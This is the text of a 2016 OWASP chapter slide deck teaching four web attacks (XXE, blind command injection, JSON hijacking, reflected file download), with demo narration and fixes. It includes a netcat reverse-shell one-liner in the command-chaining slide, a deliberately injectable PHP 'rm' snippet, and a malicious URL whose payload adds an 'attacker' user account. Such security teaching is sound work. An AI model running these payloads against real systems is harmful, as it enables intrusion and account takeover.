owasp pune chapter : dive into the profound web attacks

Narendra Bhati - Security Analystnarendra.bhati@outlook.com

Dive Into The Profound Web Attacks

OWASP Pune Chapter – 18th Feb 2016

Speaker: Narendra BhatiSecurity Analyst @Suma Soft Pvt. Ltd. – Pune

Researcher & Part Time Bug Bounty HunterListed in HOF for reporting security

Vulnerabilities like Facebook, Google, Mozilla, Twitter etc.Hold more then 12 CVE & 3 Zero days vulnerabilities.

Blog – http://websecgeeks.com

“Who Am I - r00tsh3ll”

If you have any questions or query regarding the talk, Kindly note it down. So we can discuss it at the end.

3

Dive Into The Profound Web Attacks

• XXE ( XML External Entity Injection)

• Blind RCE ( Blind Remote/OS Command Execution )

• JSON Response Hijacking

• Reflected File Download

• XXE ( XML External Entity Injection)

5

• XXE ( XML External Entity Injection)

According To OWASP

An XML External Entity attack is a type of an injection attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data

6

• XXE ( XML External Entity Injection)

Why XXE Take Place ?

Failure to validate External XML Entity which gives an attacker the accessing internal resources/data

7

• XXE ( XML External Entity Injection)

Lets Have A Demo !

8

• XXE ( XML External Entity Injection)Getting connection from target domain

9

Accessing internal directories. Doing brute forcing or anything we found a directory in localhost called “/betatesting/testing.php” which is a network utility.

Invalid directory. Response with failed to load external entity.

Valid directory. Response without failed to load external entity or some kind of difference in valid and invalid directory response..

• XXE ( XML External Entity Injection)

10

I am leaving the rest of the process, As per the “testing.php” response. We added a get parameter called “ping” and see we were to able to execute commands.

This is a scenario, Where target system have some beta testing application which is under development or etc. You should figured out what you can do with XXE or any other vulnerability

• XXE ( XML External Entity Injection)

Fixing The XXE

Disable XML parser in order to prevent XXE

For PHP :bool libxml_disable_entity_loader ([ bool $disable = true ] )

For .Net:settings.XmlResolver = null;

Look for the other languages as well.

11

• XXE ( XML External Entity Injection)

Fixing The XXE

Disable XML parser in order to prevent XXE

For PHP :bool libxml_disable_entity_loader ([ bool $disable = true ] )

For .Net:settings.XmlResolver = null;

Look for the other languages as well.

12

• XXE ( XML External Entity Injection)

Fixing The XXE

Disable XML parser in order to prevent XXE

For PHP :bool libxml_disable_entity_loader ([ bool $disable = true ] )

For .Net:settings.XmlResolver = null;

Look for the other languages as well.

13

Blind RCE ( Blind Remote/OS Command Execution )

14

Blind RCE ( Blind Remote/OS Command Execution )

According To Nature/Behaviour Similar or Elder Brother Of Blind SQL Injection vulnerability.

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application

According To OWASP

15

Blind RCE ( Blind Remote/OS Command Execution )

Why RCE Take Place ?

Missing/Lack of sanitization of user input, which will append at system shell while execution.

16

Blind RCE ( Blind Remote/OS Command Execution )

Ex. Vulnerable Code As PHP

<?phpprint("Please specify the name of the file to delete");print("<p>");$file=$_GET['filename'];system("rm $file");?>

Injection Point

17

Blind RCE ( Blind Remote/OS Command Execution )Some Basic About Using Double Commands

• A; B = Run A and then B, no matter success execution of A

• A || B = Run B if A failed, No matter if B got failed, A will still run

• A && B = Run B if A works, If A Failed B will not execute

• A & B = Run B and then run A in background, If A failed B will still get executed

• A | B = Run A and pass the output of A to B

• A %0a B (Use full for web app)

• $(nc –nv ip port –e /bin/bash) 18

Blind RCE ( Blind Remote/OS Command Execution )

Demo Time

Normal RCE | Some Bypasses | Blind RCE [Low-Medium]

19

Blind RCE ( Blind Remote/OS Command Execution )

Detection On Time Delay Response

20

Response comes in 4 Sec Aprox.

Response comes in 11 Sec Aprox.

Blind RCE ( Blind Remote/OS Command Execution )

21

In demonstration, We are assuming that target server is configured in such a way that he will not send reverse connection using netcat -e option and we cant use wget also.

Response from command “id” getting logged in our python simple http server

Lets see are we able to access the /var/tmp folder.Yes we are because in python server we got the response as /var/tmp

Using similar kind of aproach, We can interact with shell response. Remember we are not using netcat –e option for the response, But we are just piping the output to another machine

Blind RCE ( Blind Remote/OS Command Execution )

Fixing The Command Execution

• The developer should scrub all input for malicious characters.

• It is much easier to define the legal characters than the illegal characters.

22

JSON Response Hijacking

23

JSON Response Hijacking

Similar to CSRF, This vulnerability basically based on Browsers Bug which allow an attacker to steal sensitive JSON response from victim authenticated session or there could be more interesting thing.

According To Sources

24

JSON Response HijackingJSON Hijacking Happened If

Source - http://haacked.com/archive/2009/06/25/json-hijacking.aspx/

• returns sensitive data.

• returns a JSON array. [ content type-json]

• responds to GET requests.

• the browser making the request has JavaScript enabled (the browser making the request supports the __defineSetter__ method.

25

JSON Response Hijacking

Lets Dive Into The Demo

26

JSON Response Hijacking

Fixing JSON Hijacking

Source - http://haacked.com/archive/2009/06/25/json-hijacking.aspx/

• Only return JSON objects to POST requests.• Prevent the web browser from interpreting the

JSON object as valid JavaScript code.• Implement CSRF protection random tokens for all

JSON requests.

27

Reflected File Download

28

Reflected File Download

According To Sources

29

RFD is a web attack vector that enables attackers to gain complete control over a victims machine by virtually downloading a file from a trusted domain.Recently found in Facebook & Google Etc by researchers.

Source- https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf

Reflected File Download

Reflected: There should be reflection of the value given in the URL as response

Filename: File name should allowing or characterized by great or excessive freedom of behavior which should also accept additional user control values and file type.Like application can accept filename between first slash “/” and “?” character.Ex. Code (PHP)(Will Not Work)

Lets Separate Those Words

30

Reflected File Download

Download :

https://anyvulnerablewebsite.com/json;/maliciousfile.bat/.exe?download=anycommand “malicious.bat/,exe“

So basically this is browser behavior that how he will handle the download process,Mention behavior is for chrome Expect other browsers.

Other brewers may have different behavior for the same.

Lets Separate Those Words

31

Reflected File Download

1. Attacker send a malicious URL to victim of trusted domain.

Ex. http://anytrustedsite.com/apitest/search;setup.bat?term=f00bar&callback=net user attacker attacker

2. Victim found the domain is trusted. So he will access the URL.

3. After clicking on the URL, The file will be downloaded and after executing that file, Some interesting thing will happened. ;)

Attack Scenario

32

Reflected File Download

Lets See A Demo

33

Reflected File DownloadAs you can can see we having a web application. The

value of download parameter is getting back in response without file name header.

And the response is downloadable

34

Reflected File DownloadNow we are going to enter a file name in url, Because the response header don’t have the file name header. So we have chance that we can control the file name

from URL it self.

35

Reflected File DownloadNow can craft a payload as input which will execute some system command on victim machine.As per the reflection we can separate out the rest of the value to perform a command execution

36

Reflected File DownloadAfter executing that file we have calc execution.

37

Reflected File DownloadCreate some interesting payload. Before doing lets check out user accounts.

38

Reflected File DownloadAfter executing the downloaded file, We have an another user account called “attacker”

39

Reflected File Download

Add - Content-Disposition: attachment; filename=anyfile.pdf/txt

Don’t allow the application to take permissive input.

Limit the callback function for “;:/” characters.

Fixing The Reflected File Download

40

41Source-http://www.gapingvoidart.com/gallery/images/142061/any-questions.gif?sw,605,476,0,0,100,16777215,368040352

Thanks, For listening peacefully

Kindly send me your feedback regarding the talk on – narendra.bhati@outlook.comIt will help me to improve the presentation next time.

42